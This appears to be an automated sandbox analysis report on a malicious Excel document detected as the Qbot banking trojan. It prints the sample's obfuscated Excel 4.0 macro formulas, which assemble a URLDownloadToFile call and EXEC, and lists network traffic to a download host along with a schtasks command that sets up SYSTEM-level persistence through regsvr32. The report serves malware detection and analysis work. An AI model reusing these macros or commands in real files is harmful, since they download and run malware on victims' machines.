                                      ,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=FORMULA.ARRAY(Doc3!AF23&""2 "",before.2.0.0.sheet!AD15)","=FORMULA.ARRAY(Doc2!AF3,Doc2!AE22)","=FORMULA.ARRAY(Doc2!AE3&Doc2!AE4&Doc2!AE5&Doc2!AE6&Doc2!AE7&Doc2!AE8&Doc2!AE9&Doc2!AE10&Doc2!AE11&Doc2!AE12&Doc2!AE13&Doc2!AE14&Doc2!AE15&Doc2!AE16&Doc2!AE17&Doc2!AE18&Doc2!AE19&Doc2!AE20,before.2.0.0.sheet!AF15)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=AE14(),=AF14(),"=""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&before.2.0.0.sheet!AK22()",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=CALL(""U""&""R""&Doc2!AF8&""n"",Doc3!AF22&Doc3!AF21&Doc2!AD24&Doc2!AE22,""JJCCBB"",0,before.2.0.0.sheet!A100,""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&""""&Doc2!AF7,0)",,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,=Doc3!AI4(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,
                                      ,,,=EXEC(Doc1!AD15&Doc2!AF7&Doc1!AF15),,,,,,,,,,,,=HALT(),,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,"=REPLACE(Doc2!AD25,7,7,""nloadTo"")",,,"=REPLACE(AH23,7,7,"""")",,,"=REPLACE(Doc2!AD3&Doc2!AD4&Doc2!AD5&Doc2!AD6&Doc2!AD7,7,7,""l3"")",,URL,

                                      Network Behavior

                                      Network Port Distribution

                                      TCP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 25, 2021 22:38:43.075177908 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.212440968 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.212564945 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.225106001 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.361507893 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.361927032 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.361980915 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.362024069 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.362040997 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.362051010 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.362138987 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.362148046 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.362153053 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.363699913 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.363778114 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.373276949 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:43.510859013 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:43.511344910 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:44.576421976 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:44.754740000 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028366089 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028394938 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028407097 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028419018 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028434992 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028453112 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028465986 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028486013 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028502941 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028624058 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.028677940 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.028685093 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.028763056 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.028826952 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.031599045 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167642117 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167675018 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167690992 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167707920 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167726994 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167745113 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167762995 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167781115 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167793036 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167799950 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167819977 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167834044 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167838097 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167855978 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167856932 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167876959 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167895079 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167901993 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167912960 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167927027 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167929888 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167948008 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167960882 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167964935 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.167979956 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.167983055 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.168000937 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.168018103 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.168034077 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.168040991 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.170635939 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.170656919 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.305948973 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.305980921 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.305994034 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306013107 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306039095 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306056023 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306071997 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306088924 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306104898 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306119919 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306135893 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306155920 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306173086 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306185961 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306197882 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306210995 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306227922 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306245089 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306266069 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306282997 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306298971 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306314945 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306330919 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306339979 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.306346893 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306364059 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306370974 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.306376934 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.306380987 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306382895 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.306387901 CET49167443192.168.2.22104.196.7.213
                                      Feb 25, 2021 22:38:45.306401014 CET44349167104.196.7.213192.168.2.22
                                      Feb 25, 2021 22:38:45.306415081 CET49167443192.168.2.22104.196.7.213

                                      UDP Packets

                                      TimestampSource PortDest PortSource IPDest IP
                                      Feb 25, 2021 22:38:42.957261086 CET5219753192.168.2.228.8.8.8
                                      Feb 25, 2021 22:38:43.050405979 CET53521978.8.8.8192.168.2.22
                                      Feb 25, 2021 22:38:43.968379974 CET5309953192.168.2.228.8.8.8
                                      Feb 25, 2021 22:38:44.023413897 CET53530998.8.8.8192.168.2.22
                                      Feb 25, 2021 22:38:44.035146952 CET5283853192.168.2.228.8.8.8
                                      Feb 25, 2021 22:38:44.083853960 CET53528388.8.8.8192.168.2.22

                                      DNS Queries

                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                      Feb 25, 2021 22:38:42.957261086 CET192.168.2.228.8.8.80xb648Standard query (0)remedial.aaua.edu.ngA (IP address)IN (0x0001)

                                      DNS Answers

                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                      Feb 25, 2021 22:38:43.050405979 CET8.8.8.8192.168.2.220xb648No error (0)remedial.aaua.edu.ngaaua.edu.ngCNAME (Canonical name)IN (0x0001)
                                      Feb 25, 2021 22:38:43.050405979 CET8.8.8.8192.168.2.220xb648No error (0)aaua.edu.ng104.196.7.213A (IP address)IN (0x0001)

                                      HTTPS Packets

                                      TimestampSource IPSource PortDest IPDest PortSubjectIssuerNot BeforeNot AfterJA3 SSL Client FingerprintJA3 SSL Client Digest
                                      Feb 25, 2021 22:38:43.363699913 CET104.196.7.213443192.168.2.2249167CN=remedial.aaua.edu.ng CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBSat Dec 26 01:00:00 CET 2020 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004Sat Mar 27 00:59:59 CET 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029771,49192-49191-49172-49171-159-158-57-51-157-156-61-60-53-47-49196-49195-49188-49187-49162-49161-106-64-56-50-10-19,0-10-11-13-23-65281,23-24,07dcce5b76c8b17472d024758970a406b
                                      CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=USCN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBMon May 18 02:00:00 CEST 2015Sun May 18 01:59:59 CEST 2025
                                      CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GBCN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GBThu Jan 01 01:00:00 CET 2004Mon Jan 01 00:59:59 CET 2029

                                      Code Manipulations

                                      Statistics

                                      Behavior

                                      Click to jump to process

                                      System Behavior

                                      General

                                      Start time:22:38:34
                                      Start date:25/02/2021
                                      Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                      Wow64 process (32bit):false
                                      Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                      Imagebase:0x13f5c0000
                                      File size:27641504 bytes
                                      MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:22:38:40
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\rundll32.exe
                                      Wow64 process (32bit):false
                                      Commandline:rundll32 ..\kdfe.vbox,DllRegisterServer
                                      Imagebase:0xff4f0000
                                      File size:45568 bytes
                                      MD5 hash:DD81D91FF3B0763C392422865C9AC12E
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:22:38:40
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\rundll32.exe
                                      Wow64 process (32bit):true
                                      Commandline:rundll32 ..\kdfe.vbox,DllRegisterServer
                                      Imagebase:0xbc0000
                                      File size:44544 bytes
                                      MD5 hash:51138BEEA3E2C21EC44D0932C71762A8
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000004.00000002.2094377277.0000000000300000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:moderate

                                      General

                                      Start time:22:38:43
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\explorer.exe
                                      Wow64 process (32bit):true
                                      Commandline:C:\Windows\SysWOW64\explorer.exe
                                      Imagebase:0x80000
                                      File size:2972672 bytes
                                      MD5 hash:6DDCA324434FFA506CF7DC4E51DB7935
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Yara matches:
                                      • Rule: JoeSecurity_Qbot_1, Description: Yara detected Qbot, Source: 00000005.00000002.2356101330.00000000003A0000.00000040.00000001.sdmp, Author: Joe Security
                                      Reputation:high

                                      General

                                      Start time:22:38:44
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\schtasks.exe
                                      Wow64 process (32bit):true
                                      Commandline:'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn sgovokol /tr 'regsvr32.exe -s \'C:\Users\user\kdfe.vbox\'' /SC ONCE /Z /ST 22:40 /ET 22:52
                                      Imagebase:0xbd0000
                                      File size:179712 bytes
                                      MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:22:38:45
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\taskeng.exe
                                      Wow64 process (32bit):false
                                      Commandline:taskeng.exe {DA6299CA-95CA-4E9D-8974-2CC05321254C} S-1-5-18:NT AUTHORITY\System:Service:
                                      Imagebase:0xffb40000
                                      File size:464384 bytes
                                      MD5 hash:65EA57712340C09B1B0C427B4848AE05
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:22:38:46
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\regsvr32.exe
                                      Wow64 process (32bit):false
                                      Commandline:regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                                      Imagebase:0xffd30000
                                      File size:19456 bytes
                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:22:38:46
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                      Wow64 process (32bit):true
                                      Commandline: -s 'C:\Users\user\kdfe.vbox'
                                      Imagebase:0xc90000
                                      File size:14848 bytes
                                      MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      General

                                      Start time:22:40:00
                                      Start date:25/02/2021
                                      Path:C:\Windows\System32\regsvr32.exe
                                      Wow64 process (32bit):false
                                      Commandline:regsvr32.exe -s 'C:\Users\user\kdfe.vbox'
                                      Imagebase:0xffdf0000
                                      File size:19456 bytes
                                      MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:high

                                      General

                                      Start time:22:40:00
                                      Start date:25/02/2021
                                      Path:C:\Windows\SysWOW64\regsvr32.exe
                                      Wow64 process (32bit):true
                                      Commandline: -s 'C:\Users\user\kdfe.vbox'
                                      Imagebase:0x220000
                                      File size:14848 bytes
                                      MD5 hash:432BE6CF7311062633459EEF6B242FB5
                                      Has elevated privileges:true
                                      Has administrator privileges:true
                                      Programmed in:C, C++ or other language
                                      Reputation:moderate

                                      Disassembly

                                      Code Analysis

                                      Reset < >